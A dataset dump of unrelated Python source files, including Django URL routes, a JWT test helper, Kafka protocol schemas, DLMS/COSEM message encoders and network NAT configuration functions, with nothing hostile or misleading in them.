id (string, length 2-8) | text (string, length 16-264k) | dataset_id (string, 1 distinct value) |
---|---|---|
1874352
|
<gh_stars>1-10
from django.urls import path
from administracao.views import (
IndexAdministracaoView,
AdministracaoSearchView,
)
urlpatterns = [
path('', IndexAdministracaoView.as_view(), name='index-administracao'),
path('busca/', AdministracaoSearchView.as_view(), name='busca-ad'),
]
|
StarcoderdataPython
|
398521
|
# Copyright © 2019 Province of British Columbia
#
# Licensed under the Apache License, Version 2.0 (the 'License');
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an 'AS IS' BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Data for the JWT tokens."""
from typing import List
STAFF_ROLE = 'staff'
def helper_create_jwt(jwt_manager, roles: List[str] = [], username: str = 'test-user'):
"""Create a jwt bearer token with the correct keys, roles and username."""
token_header = {
'alg': 'RS256',
'typ': 'JWT',
'kid': 'flask-jwt-oidc-test-client'
}
claims = {
'iss': 'https://example.localdomain/auth/realms/example',
'sub': '43e6a245-0bf7-4ccf-9bd0-e7fb85fd18cc',
'aud': 'example',
'exp': 2539722391,
'iat': 1539718791,
'jti': 'flask-jwt-oidc-test-support',
'typ': 'Bearer',
'username': f'{username}',
'realm_access': {
'roles': [] + roles
}
}
return jwt_manager.create_jwt(claims, token_header)
def create_header(jwt_manager, roles: List[str] = [], username: str = 'test-user', **kwargs):
"""Return a header containing a JWT bearer token."""
token = helper_create_jwt(jwt_manager, roles=roles, username=username)
headers = {**kwargs, **{'Authorization': 'Bearer ' + token}}
return headers
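# Illustrative usage sketch (not part of the original module): `jwt` below is a
# placeholder for an already-initialized flask-jwt-oidc style jwt_manager and
# `client` for a test client; the extra kwarg just shows how **kwargs flow into
# the returned header dict.
#
#     headers = create_header(jwt, roles=[STAFF_ROLE], username='test-staff',
#                             **{'Accept': 'application/json'})
#     rv = client.get('/some/protected/endpoint', headers=headers)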
|
StarcoderdataPython
|
386455
|
<gh_stars>0
from django.urls import path
app_name = "{{django_app_name}}-api"
urlpatterns = [
]
|
StarcoderdataPython
|
4843926
|
# this is not right
# i am not a dictionary
# I am your Brain..
# This is just a random text..
# Don't try to make sense of everything
import this
|
StarcoderdataPython
|
6503560
|
from __future__ import absolute_import
from kafka.protocol.api import Request, Response
from kafka.protocol.types import Int16, Int32, Int64, String, Array, Schema, Bytes
class ProduceResponse_v0(Response):
API_KEY = 0
API_VERSION = 0
SCHEMA = Schema(
('topics', Array(
('topic', String('utf-8')),
('partitions', Array(
('partition', Int32),
('error_code', Int16),
('offset', Int64)))))
)
class ProduceResponse_v1(Response):
API_KEY = 0
API_VERSION = 1
SCHEMA = Schema(
('topics', Array(
('topic', String('utf-8')),
('partitions', Array(
('partition', Int32),
('error_code', Int16),
('offset', Int64))))),
('throttle_time_ms', Int32)
)
class ProduceResponse_v2(Response):
API_KEY = 0
API_VERSION = 2
SCHEMA = Schema(
('topics', Array(
('topic', String('utf-8')),
('partitions', Array(
('partition', Int32),
('error_code', Int16),
('offset', Int64),
('timestamp', Int64))))),
('throttle_time_ms', Int32)
)
class ProduceResponse_v3(Response):
API_KEY = 0
API_VERSION = 3
SCHEMA = ProduceResponse_v2.SCHEMA
class ProduceResponse_v4(Response):
"""
The version number is bumped up to indicate that the client supports KafkaStorageException.
The KafkaStorageException will be translated to NotLeaderForPartitionException in the response if version <= 3
"""
API_KEY = 0
API_VERSION = 4
SCHEMA = ProduceResponse_v3.SCHEMA
class ProduceResponse_v5(Response):
API_KEY = 0
API_VERSION = 5
SCHEMA = Schema(
('topics', Array(
('topic', String('utf-8')),
('partitions', Array(
('partition', Int32),
('error_code', Int16),
('offset', Int64),
('timestamp', Int64),
('log_start_offset', Int64))))),
('throttle_time_ms', Int32)
)
class ProduceRequest(Request):
API_KEY = 0
def expect_response(self):
if self.required_acks == 0: # pylint: disable=no-member
return False
return True
class ProduceRequest_v0(ProduceRequest):
API_VERSION = 0
RESPONSE_TYPE = ProduceResponse_v0
SCHEMA = Schema(
('required_acks', Int16),
('timeout', Int32),
('topics', Array(
('topic', String('utf-8')),
('partitions', Array(
('partition', Int32),
('messages', Bytes)))))
)
class ProduceRequest_v1(ProduceRequest):
API_VERSION = 1
RESPONSE_TYPE = ProduceResponse_v1
SCHEMA = ProduceRequest_v0.SCHEMA
class ProduceRequest_v2(ProduceRequest):
API_VERSION = 2
RESPONSE_TYPE = ProduceResponse_v2
SCHEMA = ProduceRequest_v1.SCHEMA
class ProduceRequest_v3(ProduceRequest):
API_VERSION = 3
RESPONSE_TYPE = ProduceResponse_v3
SCHEMA = Schema(
('transactional_id', String('utf-8')),
('required_acks', Int16),
('timeout', Int32),
('topics', Array(
('topic', String('utf-8')),
('partitions', Array(
('partition', Int32),
('messages', Bytes)))))
)
class ProduceRequest_v4(ProduceRequest):
"""
The version number is bumped up to indicate that the client supports KafkaStorageException.
The KafkaStorageException will be translated to NotLeaderForPartitionException in the response if version <= 3
"""
API_VERSION = 4
RESPONSE_TYPE = ProduceResponse_v4
SCHEMA = ProduceRequest_v3.SCHEMA
class ProduceRequest_v5(ProduceRequest):
"""
Same as v4. The version number is bumped since the v5 response includes an additional
partition level field: the log_start_offset.
"""
API_VERSION = 5
RESPONSE_TYPE = ProduceResponse_v5
SCHEMA = ProduceRequest_v4.SCHEMA
ProduceRequest = [
ProduceRequest_v0, ProduceRequest_v1, ProduceRequest_v2,
ProduceRequest_v3, ProduceRequest_v4, ProduceRequest_v5
]
ProduceResponse = [
ProduceResponse_v0, ProduceResponse_v1, ProduceResponse_v2,
ProduceResponse_v3, ProduceResponse_v4, ProduceResponse_v5
]
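# Illustrative note (not part of the original module): the two lists above are
# indexed by API version, mirroring each class's API_VERSION attribute, so a
# client can look up a matching request/response pair, e.g.:
#
#     request_cls = ProduceRequest[3]            # ProduceRequest_v3
#     response_cls = request_cls.RESPONSE_TYPE   # ProduceResponse_v3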
|
StarcoderdataPython
|
1694647
|
# Licensed to the StackStorm, Inc ('StackStorm') under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from webob.headers import ResponseHeaders
from st2common.constants.api import CACHE_CONTROL_HEADER
class CacheMiddleware(object):
def __init__(self, app):
self.app = app
def __call__(self, environ, start_response):
def custom_start_response(status, headers, exc_info=None):
headers = ResponseHeaders(headers)
headers['Cache-Control'] = CACHE_CONTROL_HEADER
return start_response(status, headers._items, exc_info)
return self.app(environ, custom_start_response)
|
StarcoderdataPython
|
3491941
|
from functools import partial
from typing import *
import attr
import dlms_cosem.utils
from dlms_cosem import a_xdr, cosem, dlms_data
from dlms_cosem import enumerations as enums
from dlms_cosem.cosem import selective_access
from dlms_cosem.dlms_data import (
VARIABLE_LENGTH,
AbstractDlmsData,
DlmsDataFactory,
decode_variable_integer,
encode_variable_integer,
)
from dlms_cosem.protocol.xdlms.base import AbstractXDlmsApdu
from dlms_cosem.protocol.xdlms.invoke_id_and_priority import InvokeIdAndPriority
get_request_type_from_bytes = partial(enums.GetRequestType.from_bytes, byteorder="big")
get_response_type_from_bytes = partial(
enums.GetResponseType.from_bytes, byteorder="big"
)
class NullValue:
def __call__(self):
return None
def if_falsy_set_none(value):
if value:
return value
@attr.s(auto_attribs=True)
class GetRequestNormal(AbstractXDlmsApdu):
"""
Represents a Get request.
Get requests are modeled with a choice but we only support the normal one.
Get requests work on single attributes of interface classes.
To get a value you would need the interface class, the instance (OBIS) and the
attribute id.
Some attributes allow for selective access to the attributes. For example a load
profile might be read from a specific date or a specific entry.
"""
TAG: ClassVar[int] = 192
REQUEST_TYPE: ClassVar[enums.GetRequestType] = enums.GetRequestType.NORMAL
cosem_attribute: cosem.CosemAttribute = attr.ib(
validator=attr.validators.instance_of(cosem.CosemAttribute)
)
invoke_id_and_priority: InvokeIdAndPriority = attr.ib(
factory=InvokeIdAndPriority,
validator=attr.validators.instance_of(InvokeIdAndPriority),
)
access_selection: Optional[
Union[selective_access.RangeDescriptor, selective_access.EntryDescriptor]
] = attr.ib(default=None, converter=if_falsy_set_none)
@classmethod
def from_bytes(cls, source_bytes: bytes):
data = bytearray(source_bytes)
tag = data.pop(0)
if tag != cls.TAG:
raise ValueError(
f"Tag for GET request is not correct. Got {tag}, should be {cls.TAG}"
)
type_choice = enums.GetRequestType(data.pop(0))
if type_choice is not enums.GetRequestType.NORMAL:
raise ValueError(
"The data for the GetRequest is not for a GetRequestNormal"
)
invoke_id_and_priority = InvokeIdAndPriority.from_bytes(
data.pop(0).to_bytes(1, "big")
)
cosem_attribute_data = data[:9]
cosem_attribute = cosem.CosemAttribute.from_bytes(cosem_attribute_data)
data = data[9:]
has_access_selection = bool(data.pop(0))
if has_access_selection:
access_selection = selective_access.AccessDescriptorFactory.from_bytes(data)
else:
access_selection = None
return cls(
cosem_attribute=cosem_attribute,
invoke_id_and_priority=invoke_id_and_priority,
access_selection=access_selection,
)
def to_bytes(self):
# automatically adding the choice for GetRequestNormal.
out = bytearray()
out.append(self.TAG)
out.append(self.REQUEST_TYPE.value)
out.extend(self.invoke_id_and_priority.to_bytes())
out.extend(self.cosem_attribute.to_bytes())
if self.access_selection:
out.extend(b"\x01")
out.extend(self.access_selection.to_bytes())
else:
out.extend(b"\x00")
return bytes(out)
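# Illustrative round-trip sketch (not part of the original module): `raw_apdu` is a
# placeholder for bytes captured off the wire that start with TAG 192 and the
# NORMAL request type; a parsed request re-encodes to the same bytes.
#
#     request = GetRequestNormal.from_bytes(raw_apdu)
#     assert request.to_bytes() == raw_apdu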
@attr.s(auto_attribs=True)
class GetRequestNext(AbstractXDlmsApdu):
TAG: ClassVar[int] = 192
REQUEST_TYPE: ClassVar[enums.GetRequestType] = enums.GetRequestType.NEXT
block_number: int = attr.ib(validator=attr.validators.instance_of(int), default=0)
invoke_id_and_priority: InvokeIdAndPriority = attr.ib(
factory=InvokeIdAndPriority,
validator=attr.validators.instance_of(InvokeIdAndPriority),
)
@classmethod
def from_bytes(cls, source_bytes: bytes):
data = bytearray(source_bytes)
tag = data.pop(0)
if tag != cls.TAG:
raise ValueError(
f"Tag for GET request is not correct. Got {tag}, should be {cls.TAG}"
)
type_choice = enums.GetRequestType(data.pop(0))
if type_choice is not enums.GetRequestType.NEXT:
raise ValueError("The data for the GetRequest is not for a GetRequestNext")
invoke_id_and_priority = InvokeIdAndPriority.from_bytes(
data.pop(0).to_bytes(1, "big")
)
assert len(data) == 4 # should only be block number left.
block_number = int.from_bytes(data, "big")
return cls(block_number, invoke_id_and_priority)
def to_bytes(self) -> bytes:
out = bytearray()
out.append(self.TAG)
out.append(self.REQUEST_TYPE)
out.extend(self.invoke_id_and_priority.to_bytes())
out.extend(self.block_number.to_bytes(4, "big"))
return bytes(out)
@attr.s(auto_attribs=True)
class GetRequestWithList(AbstractXDlmsApdu):
TAG: ClassVar[int] = 192
REQUEST_TYPE: ClassVar[enums.GetRequestType] = enums.GetRequestType.WITH_LIST
cosem_attributes_with_selection: List[cosem.CosemAttributeWithSelection]
invoke_id_and_priority: InvokeIdAndPriority = attr.ib(
factory=InvokeIdAndPriority,
validator=attr.validators.instance_of(InvokeIdAndPriority),
)
@classmethod
def from_bytes(cls, source_bytes: bytes):
data = bytearray(source_bytes)
tag = data.pop(0)
if tag != cls.TAG:
raise ValueError(
f"Tag for GET request is not correct. Got {tag}, should be {cls.TAG}"
)
type_choice = enums.GetRequestType(data.pop(0))
if type_choice is not enums.GetRequestType.WITH_LIST:
raise ValueError(
"The data for the GetRequest is not for a GetRequestWithList"
)
invoke_id_and_priority = InvokeIdAndPriority.from_bytes(
data.pop(0).to_bytes(1, "big")
)
number_of_items = data.pop(0)
cosem_atts = list()
for i in range(0, number_of_items):
# Not really happy with the format of this but it works fine.
c = cosem.CosemAttributeWithSelection.from_bytes(data)
cosem_atts.append(c)
data = data[len(c.to_bytes()) :]
return cls(
cosem_attributes_with_selection=cosem_atts,
invoke_id_and_priority=invoke_id_and_priority,
)
def to_bytes(self) -> bytes:
out = bytearray()
out.append(self.TAG)
out.append(self.REQUEST_TYPE)
out.extend(self.invoke_id_and_priority.to_bytes())
out.extend(
encode_variable_integer(len(self.cosem_attributes_with_selection))
) # number of items
for item in self.cosem_attributes_with_selection:
out.extend(item.to_bytes())
return bytes(out)
@attr.s(auto_attribs=True)
class GetRequestFactory:
"""
The factory will parse the GetRequest and return either a GetRequestNormal,
GetRequestNext or a GetRequestWithList.
"""
TAG: ClassVar[int] = 192
@staticmethod
def from_bytes(source_bytes: bytes):
data = bytearray(source_bytes)
tag = data.pop(0)
if tag != GetRequestFactory.TAG:
raise ValueError(
f"Tag for GET request is not correct. Got {tag}, should be "
f"{GetRequestFactory.TAG}"
)
request_type = enums.GetRequestType(data.pop(0))
if request_type == enums.GetRequestType.NORMAL:
return GetRequestNormal.from_bytes(source_bytes)
elif request_type == enums.GetRequestType.NEXT:
return GetRequestNext.from_bytes(source_bytes)
elif request_type == enums.GetRequestType.WITH_LIST:
return GetRequestWithList.from_bytes(source_bytes)
else:
raise ValueError(
f"Received an enum request type that is not valid for "
f"GetRequest: {request_type}"
)
@attr.s(auto_attribs=True)
class GetResponseNormal(AbstractXDlmsApdu):
TAG: ClassVar[int] = 196
RESPONSE_TYPE: ClassVar[enums.GetResponseType] = enums.GetResponseType.NORMAL
data: bytes = attr.ib(validator=attr.validators.instance_of(bytes))
invoke_id_and_priority: InvokeIdAndPriority = attr.ib(
factory=InvokeIdAndPriority,
validator=attr.validators.instance_of(InvokeIdAndPriority),
)
@classmethod
def from_bytes(cls, source_bytes: bytes):
data = bytearray(source_bytes)
tag = data.pop(0)
if tag != cls.TAG:
raise ValueError(f"Tag is not correct. Should be {cls.TAG} but is {tag}")
response_type = enums.GetResponseType(data.pop(0))
if response_type != cls.RESPONSE_TYPE:
raise ValueError(
f"The response type byte: {response_type} is not for a GetResponseNormal"
)
invoke_id_and_priority = InvokeIdAndPriority.from_bytes(
data.pop(0).to_bytes(1, "big")
)
choice = data.pop(0)
if choice != 0:
raise ValueError(f"The data choice is not 0 to indicate data but: {choice}")
return cls(bytes(data), invoke_id_and_priority)
def to_bytes(self) -> bytes:
out = bytearray()
out.append(self.TAG)
out.append(self.RESPONSE_TYPE)
out.extend(self.invoke_id_and_priority.to_bytes())
out.append(0) # data result choice
out.extend(self.data)
return bytes(out)
@attr.s(auto_attribs=True)
class GetResponseNormalWithError(AbstractXDlmsApdu):
TAG: ClassVar[int] = 196
RESPONSE_TYPE: ClassVar[enums.GetResponseType] = enums.GetResponseType.NORMAL
error: enums.DataAccessResult = attr.ib(
validator=attr.validators.instance_of(enums.DataAccessResult)
)
invoke_id_and_priority: InvokeIdAndPriority = attr.ib(
factory=InvokeIdAndPriority,
validator=attr.validators.instance_of(InvokeIdAndPriority),
)
@classmethod
def from_bytes(cls, source_bytes: bytes):
data = bytearray(source_bytes)
tag = data.pop(0)
if tag != cls.TAG:
raise ValueError(f"Tag is not correct. Should be {cls.TAG} but is {tag}")
response_type = enums.GetResponseType(data.pop(0))
if response_type != cls.RESPONSE_TYPE:
raise ValueError(
f"The response type byte: {response_type} is not for a GetResponseNormal"
)
invoke_id_and_priority = InvokeIdAndPriority.from_bytes(
data.pop(0).to_bytes(1, "big")
)
choice = data.pop(0)
if choice != 1:
raise ValueError(
f"The data choice is not 1 to indicate error but: {choice}"
)
error = enums.DataAccessResult(data.pop(0))
return cls(error, invoke_id_and_priority)
def to_bytes(self) -> bytes:
out = bytearray()
out.append(self.TAG)
out.append(self.RESPONSE_TYPE)
out.extend(self.invoke_id_and_priority.to_bytes())
out.append(1) # data error choice
out.extend(self.error.to_bytes(1, "big"))
return bytes(out)
@attr.s(auto_attribs=True)
class GetResponseWithBlock(AbstractXDlmsApdu):
"""
The data sent in a block response is an OCTET STRING, not an instance of DLMS Data, so it has the length encoding first.
"""
TAG: ClassVar[int] = 196
RESPONSE_TYPE: ClassVar[enums.GetResponseType] = enums.GetResponseType.WITH_BLOCK
data: bytes = attr.ib(validator=attr.validators.instance_of(bytes))
block_number: int = attr.ib(validator=attr.validators.instance_of(int), default=0)
invoke_id_and_priority: InvokeIdAndPriority = attr.ib(
factory=InvokeIdAndPriority,
validator=attr.validators.instance_of(InvokeIdAndPriority),
)
@classmethod
def from_bytes(cls, source_bytes: bytes):
data = bytearray(source_bytes)
tag = data.pop(0)
if tag != cls.TAG:
raise ValueError(f"Tag is not correct. Should be {cls.TAG} but is {tag}")
response_type = enums.GetResponseType(data.pop(0))
if response_type != cls.RESPONSE_TYPE:
raise ValueError(
f"The response type byte: {response_type} is not for a GetResponseNormal"
)
invoke_id_and_priority = InvokeIdAndPriority.from_bytes(
data.pop(0).to_bytes(1, "big")
)
last_block = bool(data.pop(0))
if last_block:
raise ValueError(
f"Last block set to true in a GetResponseWithBlock. Should only be set "
f"for a GetResponseLastBlock"
)
block_number = int.from_bytes(data[:4], "big")
data = data[4:]
choice = data.pop(0)
if choice != 0:
raise ValueError(f"The data choice is not 0 to indicate data but: {choice}")
data_length, data = dlms_cosem.dlms_data.decode_variable_integer(data)
if data_length != len(data):
raise ValueError(
"The octet string in block data is not of the correct length"
)
return cls(bytes(data), block_number, invoke_id_and_priority)
def to_bytes(self) -> bytes:
out = bytearray()
out.append(self.TAG)
out.append(self.RESPONSE_TYPE)
out.extend(self.invoke_id_and_priority.to_bytes())
out.append(0) # last block == False
out.extend(self.block_number.to_bytes(4, "big"))
out.append(0) # data choice = data
out.extend(
dlms_cosem.dlms_data.encode_variable_integer(len(self.data))
) # octet string length
out.extend(self.data)
return bytes(out)
@attr.s(auto_attribs=True)
class GetResponseLastBlock(AbstractXDlmsApdu):
TAG: ClassVar[int] = 196
RESPONSE_TYPE: ClassVar[enums.GetResponseType] = enums.GetResponseType.WITH_BLOCK
data: bytes = attr.ib(validator=attr.validators.instance_of(bytes))
block_number: int = attr.ib(validator=attr.validators.instance_of(int), default=0)
invoke_id_and_priority: InvokeIdAndPriority = attr.ib(
factory=InvokeIdAndPriority,
validator=attr.validators.instance_of(InvokeIdAndPriority),
)
@classmethod
def from_bytes(cls, source_bytes: bytes):
data = bytearray(source_bytes)
tag = data.pop(0)
if tag != cls.TAG:
raise ValueError(f"Tag is not correct. Should be {cls.TAG} but is {tag}")
response_type = enums.GetResponseType(data.pop(0))
if response_type != cls.RESPONSE_TYPE:
raise ValueError(
f"The response type byte: {response_type} is not for a GetResponseNormal"
)
invoke_id_and_priority = InvokeIdAndPriority.from_bytes(
data.pop(0).to_bytes(1, "big")
)
last_block = bool(data.pop(0))
if not last_block:
raise ValueError(
f"Last block is not set to true in a GetResponseLastBlock."
)
block_number = int.from_bytes(data[:4], "big")
data = data[4:]
choice = data.pop(0)
if choice != 0:
raise ValueError(f"The data choice is not 0 to indicate data but: {choice}")
data_length, data = dlms_cosem.dlms_data.decode_variable_integer(data)
if data_length != len(data):
raise ValueError(
"The octet string in block data is not of the correct length"
)
return cls(bytes(data), block_number, invoke_id_and_priority)
def to_bytes(self) -> bytes:
out = bytearray()
out.append(self.TAG)
out.append(self.RESPONSE_TYPE)
out.extend(self.invoke_id_and_priority.to_bytes())
out.append(1) # last block == True
out.extend(self.block_number.to_bytes(4, "big"))
out.append(0) # data choice = data
out.extend(
dlms_cosem.dlms_data.encode_variable_integer(len(self.data))
) # octet string length
out.extend(self.data)
return bytes(out)
@attr.s(auto_attribs=True)
class GetResponseLastBlockWithError(AbstractXDlmsApdu):
TAG: ClassVar[int] = 196
RESPONSE_TYPE: ClassVar[enums.GetResponseType] = enums.GetResponseType.WITH_BLOCK
error: enums.DataAccessResult = attr.ib(
validator=attr.validators.instance_of(enums.DataAccessResult)
)
block_number: int = attr.ib(validator=attr.validators.instance_of(int), default=0)
invoke_id_and_priority: InvokeIdAndPriority = attr.ib(
factory=InvokeIdAndPriority,
validator=attr.validators.instance_of(InvokeIdAndPriority),
)
@classmethod
def from_bytes(cls, source_bytes: bytes):
data = bytearray(source_bytes)
tag = data.pop(0)
if tag != cls.TAG:
raise ValueError(f"Tag is not correct. Should be {cls.TAG} but is {tag}")
response_type = enums.GetResponseType(data.pop(0))
if response_type != cls.RESPONSE_TYPE:
raise ValueError(
f"The response type byte: {response_type} is not for a GetResponseNormal"
)
invoke_id_and_priority = InvokeIdAndPriority.from_bytes(
data.pop(0).to_bytes(1, "big")
)
last_block = bool(data.pop(0))
if not last_block:
raise ValueError(
f"Last block is not set to true in a GetResponseLastBlock."
)
block_number = int.from_bytes(data[:4], "big")
data = data[4:]
choice = data.pop(0)
if choice != 1:
raise ValueError(
f"The data choice is not 1 to indicate error but: {choice}"
)
assert len(data) == 1
error = enums.DataAccessResult(data.pop(0))
return cls(error, block_number, invoke_id_and_priority)
def to_bytes(self) -> bytes:
out = bytearray()
out.append(self.TAG)
out.append(self.RESPONSE_TYPE)
out.extend(self.invoke_id_and_priority.to_bytes())
out.append(1) # last block == True
out.extend(self.block_number.to_bytes(4, "big"))
out.append(1) # data choice = error
out.extend(self.error.to_bytes(1, "big"))
return bytes(out)
@attr.s(auto_attribs=True)
class GetResponseWithList(AbstractXDlmsApdu):
TAG: ClassVar[int] = 196
RESPONSE_TYPE: ClassVar[enums.GetResponseType] = enums.GetResponseType.WITH_LIST
response_data: List[Union[AbstractDlmsData, enums.DataAccessResult]] = attr.ib(
factory=list
)
invoke_id_and_priority: InvokeIdAndPriority = attr.ib(
factory=InvokeIdAndPriority,
validator=attr.validators.instance_of(InvokeIdAndPriority),
)
@staticmethod
def parse_list_response(source_bytes: bytes, amount: int):
data = bytearray(source_bytes)
dlms_data_items = list()
for index in range(0, amount):
answer_selection = data.pop(0)
if answer_selection == 0:
# DLMS data
parser = dlms_data.DlmsDataParser()
obj = parser.parse(data, limit=1)
rest = parser.get_buffer_tail()
dlms_data_items.append(obj[0])
data = rest
elif answer_selection == 1:
# Data Access Result
dlms_data_items.append(enums.DataAccessResult(data.pop(0)))
else:
raise ValueError("Not a valid answer selection byte")
return dlms_data_items
@property
def result(self) -> List[Any]:
"""
Converts the response data to python objects if possible
"""
out = list()
for item in self.response_data:
if isinstance(item, enums.DataAccessResult):
out.append(item)
else:
out.append(item.to_python())
return out
@classmethod
def from_bytes(cls, source_bytes: bytes):
data = bytearray(source_bytes)
tag = data.pop(0)
if tag != cls.TAG:
raise ValueError("Not a GetResponse APDU")
response_type = data.pop(0)
if response_type != cls.RESPONSE_TYPE:
raise ValueError("Not a GetResponseWithList Apdu")
invoke_id_and_priority = InvokeIdAndPriority.from_bytes(
data.pop(0).to_bytes(1, "big")
)
# List of Get-Data-Response.
list_length = data.pop(0)
dlms_data = cls.parse_list_response(data, list_length)
return cls(
invoke_id_and_priority=invoke_id_and_priority, response_data=dlms_data
)
def to_bytes(self) -> bytes:
out = bytearray()
out.append(self.TAG)
out.append(self.RESPONSE_TYPE)
out.extend(self.invoke_id_and_priority.to_bytes())
out.extend(encode_variable_integer(len(self.response_data)))
for item in self.response_data:
if isinstance(item, AbstractDlmsData):
out.append(0)
out.extend(item.to_bytes())
elif isinstance(item, enums.DataAccessResult):
out.append(1)
out.append(item.value)
else:
raise ValueError(
f"unknown data in response for GetResponseWithList: {item}"
)
return bytes(out)
@attr.s(auto_attribs=True)
class GetResponseFactory:
TAG: ClassVar[int] = 196
@staticmethod
def from_bytes(source_bytes: bytes):
data = bytearray(source_bytes)
tag = data.pop(0)
if tag != GetResponseFactory.TAG:
raise ValueError(
f"Tag is not correct. Should be {GetResponseFactory.TAG} but is {tag}"
)
response_type = enums.GetResponseType(data.pop(0))
invoke_id_and_priority = InvokeIdAndPriority.from_bytes(
data.pop(0).to_bytes(1, "big")
)
if response_type == enums.GetResponseType.NORMAL:
# check if it is an error or data response by assessing the choice.
choice = data.pop(0)
if choice == 0:
return GetResponseNormal(
invoke_id_and_priority=invoke_id_and_priority, data=bytes(data)
)
elif choice == 1:
assert len(data) == 1 # should only be one byte left.
error = enums.DataAccessResult(data.pop(0))
return GetResponseNormalWithError(
invoke_id_and_priority=invoke_id_and_priority, error=error
)
elif response_type == enums.GetResponseType.WITH_BLOCK:
last_block = bool(data.pop(0))
block_number = int.from_bytes(data[:4], "big")
data = data[4:]
choice = data.pop(0)
if choice == 0:
data_length, data = dlms_cosem.dlms_data.decode_variable_integer(data)
if data_length != len(data):
raise ValueError(
"The octet string in block data is not of the correct length"
)
if last_block:
return GetResponseLastBlock(
bytes(data), block_number, invoke_id_and_priority
)
else:
return GetResponseWithBlock(
bytes(data), block_number, invoke_id_and_priority
)
elif choice == 1:
assert len(data) == 1 # should only be one byte left.
error = enums.DataAccessResult(data.pop(0))
if last_block:
return GetResponseLastBlockWithError(
error, block_number, invoke_id_and_priority
)
else:
raise ValueError(
"It is not possible to send an error on a "
"GetResponseWithBlock. When an error occurs it "
"should always be sent in a GetResponseLastBlockWithError"
)
elif response_type == enums.GetResponseType.WITH_LIST:
return GetResponseWithList.from_bytes(bytes(source_bytes))
else:
raise ValueError("Response type is not a valid GetResponse type")
|
StarcoderdataPython
|
6613473
|
# -*- coding: utf-8 -*-
import abc
import torch.nn as nn
from DLtorch.base import BaseComponent
import DLtorch.utils.torch_utils as torch_utils
class BaseModel(BaseComponent):
def __init__(self):
super(BaseModel, self).__init__()
self.logger.info("Module Constructed.")
self.logger.info("Parameters: {:.5f}M".format(torch_utils.get_params(self, only_trainable=False) / 1.e6))
|
StarcoderdataPython
|
4950912
|
<filename>CommonTools/ParticleFlow/python/Isolation/pfElectronIsolation_cff.py
import FWCore.ParameterSet.Config as cms
from RecoParticleFlow.PFProducer.electronPFIsolationDeposits_cff import *
from RecoParticleFlow.PFProducer.electronPFIsolationValues_cff import *
pfElectronIsolationTask = cms.Task(
electronPFIsolationDepositsTask ,
electronPFIsolationValuesTask
)
pfElectronIsolationSequence = cms.Sequence(pfElectronIsolationTask)
|
StarcoderdataPython
|
11329958
|
"""empty message
Revision ID: <KEY>
Revises: <PASSWORD>
Create Date: 2017-09-23 21:30:06.863897
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '<KEY>'
down_revision = '<PASSWORD>'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('users', sa.Column('dish_url', sa.String(length=255), nullable=True))
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_column('users', 'dish_url')
# ### end Alembic commands ###
|
StarcoderdataPython
|
9763216
|
"""Common configure functions for nat"""
# Python
import logging
# Unicon
from unicon.core.errors import SubCommandFailure
log = logging.getLogger(__name__)
def configure_nat_in_out(
device,
inside_interface=None,
outside_interface=None,
):
""" Enable nat IN and OUT over interface
Args:
device ('obj'): device to use
inside_interface ('str'): enable nat in over this interface, default value is None
outside_interface ('str'): enable nat out over this interface, default value is None
Returns:
console output
Raises:
SubCommandFailure: NAT IN OUT not enabled over interface
"""
cmd = []
if inside_interface:
cmd.append("interface {}".format(inside_interface))
cmd.append("ip nat inside")
if outside_interface:
cmd.append("interface {}".format(outside_interface))
cmd.append("ip nat outside")
try:
out = device.configure(cmd)
except SubCommandFailure as e:
raise SubCommandFailure(
"Could not Enable NAT. Error:\n{error}".format(error=e)
)
return out
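# Illustrative usage sketch (not part of the original module): `device` is assumed
# to be a connected Unicon/pyATS device object and the interface names are
# placeholders.
#
#     configure_nat_in_out(device,
#                          inside_interface='GigabitEthernet1',
#                          outside_interface='GigabitEthernet2')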
def configure_nat_overload_rule(
device,
interface,
access_list_name,
):
""" Configure interface overloaad rule
Args:
device ('obj'): device to use
interface ('str'): Interface which will be used for the overload rule
access_list_name ('str'): Name of extended access list
Returns:
console output
Raises:
SubCommandFailure: Nat overload rule not configured
"""
cmd = ["ip nat inside source list {} interface {} overload".format(access_list_name,interface)]
try:
out = device.configure(cmd)
except SubCommandFailure as e:
raise SubCommandFailure(
"Could not Configure NAT overload rule. Error:\n{error}".format(error=e)
)
return out
def unconfigure_nat_in_out(
device,
inside_interface=None,
outside_interface=None,
):
""" Disable nat IN and OUT over interface
Args:
device ('obj'): device to use
inside_interface ('str'): Disable nat in from this interface, default value is None
outside_interface ('str'): Disable nat out From this interface, default value is None
Returns:
console output
Raises:
SubCommandFailure: NAT IN OUT not disabled over interface
"""
cmd = []
if inside_interface:
cmd.append("interface {}".format(inside_interface))
cmd.append("no ip nat inside")
if outside_interface:
cmd.append("interface {}".format(outside_interface))
cmd.append("no ip nat outside")
try:
out = device.configure(cmd)
except SubCommandFailure as e:
raise SubCommandFailure(
"Could not Disable NAT. Error:\n{error}".format(error=e)
)
return out
def unconfigure_nat_overload_rule(
device,
interface,
access_list_name,
):
""" UnConfigure interface overload rule
Args:
device ('obj'): device to use
interface ('str'): Interface which will be used for the overload rule
access_list_name ('str'): Name of extended access list
Returns:
console output
Raises:
SubCommandFailure: Nat overload rule not unconfigured
"""
cmd = ["no ip nat inside source list {} interface {} overload".format(access_list_name, interface)]
try:
out = device.configure(cmd)
except SubCommandFailure as e:
raise SubCommandFailure(
"Could not UnConfigure NAT overload rule. Error:\n{error}".format(error=e)
)
return out
|
StarcoderdataPython
|
1791238
|
